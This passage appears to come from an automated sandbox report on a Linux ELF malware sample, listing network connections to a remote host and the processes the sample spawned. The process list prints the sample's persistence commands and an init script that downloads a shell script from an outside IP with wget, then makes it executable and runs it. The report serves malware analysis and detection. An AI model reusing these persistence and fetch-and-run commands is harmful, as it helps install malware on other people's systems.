                                                                                                            Dec 1, 2024 15:23:56.205888033 CET19938980154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.205964088 CET38980199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.208729982 CET38980199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.240139008 CET19938978154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.240540981 CET38980199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.329906940 CET19938980154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.333302021 CET38982199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.404058933 CET19938980154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.453330994 CET19938982154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.454166889 CET38982199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.462965012 CET38982199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.463963985 CET38982199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.490446091 CET38984199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.582986116 CET19938982154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.611259937 CET19938984154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.611387014 CET38984199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.624087095 CET19938982154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.701905966 CET38984199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.822134972 CET19938984154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.822201967 CET38984199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.834026098 CET43928443192.168.2.2391.189.91.42
                                                                                                            Dec 1, 2024 15:23:57.634865046 CET19938968154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:57.634970903 CET38968199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:57.807634115 CET19938970154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:57.807784081 CET38970199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:57.860745907 CET19938972154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:57.860857010 CET38972199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:58.009819031 CET19938974154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:58.009957075 CET38974199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:58.156589985 CET19938976154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:58.156693935 CET38976199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:58.297489882 CET19938978154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:58.297576904 CET38978199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:58.464749098 CET19938980154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:58.465362072 CET38980199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:58.720031977 CET19938982154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:58.720195055 CET38982199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:24:02.205466032 CET42836443192.168.2.2391.189.91.43
                                                                                                            Dec 1, 2024 15:24:03.997266054 CET4251680192.168.2.23109.202.202.202
                                                                                                            Dec 1, 2024 15:24:18.075418949 CET43928443192.168.2.2391.189.91.42
                                                                                                            Dec 1, 2024 15:24:28.313842058 CET42836443192.168.2.2391.189.91.43
                                                                                                            Dec 1, 2024 15:24:34.456955910 CET4251680192.168.2.23109.202.202.202
                                                                                                            Dec 1, 2024 15:24:59.029699087 CET43928443192.168.2.2391.189.91.42
                                                                                                            Dec 1, 2024 15:25:19.506725073 CET42836443192.168.2.2391.189.91.43

                                                                                                            System Behavior

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:/tmp/m68k.nn.elf
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/systemctl
                                                                                                            Arguments:systemctl enable custom.service
                                                                                                            File size:996584 bytes
                                                                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/chmod
                                                                                                            Arguments:chmod +x /etc/init.d/system
                                                                                                            File size:63864 bytes
                                                                                                            MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/ln
                                                                                                            Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                                            File size:76160 bytes
                                                                                                            MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/chmod
                                                                                                            Arguments:chmod +x /etc/init.d/m68k.nn.elf
                                                                                                            File size:63864 bytes
                                                                                                            MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/mkdir
                                                                                                            Arguments:mkdir -p /etc/rc.d
                                                                                                            File size:88408 bytes
                                                                                                            MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/tmp/m68k.nn.elf
                                                                                                            Arguments:-
                                                                                                            File size:4463432 bytes
                                                                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/bin/ln
                                                                                                            Arguments:ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
                                                                                                            File size:76160 bytes
                                                                                                            MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/udisks2/udisksd
                                                                                                            Arguments:-
                                                                                                            File size:483056 bytes
                                                                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/dumpe2fs
                                                                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                                                                            File size:31112 bytes
                                                                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/udisks2/udisksd
                                                                                                            Arguments:-
                                                                                                            File size:483056 bytes
                                                                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/dumpe2fs
                                                                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                                                                            File size:31112 bytes
                                                                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/systemd/systemd
                                                                                                            Arguments:-
                                                                                                            File size:1620224 bytes
                                                                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                            File size:22760 bytes
                                                                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/libexec/gnome-session-binary
                                                                                                            Arguments:-
                                                                                                            File size:334664 bytes
                                                                                                            MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/bin/sh
                                                                                                            Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:54
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/libexec/gsd-housekeeping
                                                                                                            Arguments:/usr/libexec/gsd-housekeeping
                                                                                                            File size:51840 bytes
                                                                                                            MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/gdm3
                                                                                                            Arguments:-
                                                                                                            File size:453296 bytes
                                                                                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/etc/gdm3/PrimeOff/Default
                                                                                                            Arguments:/etc/gdm3/PrimeOff/Default
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/gdm3
                                                                                                            Arguments:-
                                                                                                            File size:453296 bytes
                                                                                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/etc/gdm3/PrimeOff/Default
                                                                                                            Arguments:/etc/gdm3/PrimeOff/Default
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/udisks2/udisksd
                                                                                                            Arguments:-
                                                                                                            File size:483056 bytes
                                                                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/dumpe2fs
                                                                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                                                                            File size:31112 bytes
                                                                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/lib/udisks2/udisksd
                                                                                                            Arguments:-
                                                                                                            File size:483056 bytes
                                                                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                            Start time (UTC):14:23:55
                                                                                                            Start date (UTC):01/12/2024
                                                                                                            Path:/usr/sbin/dumpe2fs
                                                                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                                                                            File size:31112 bytes
                                                                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4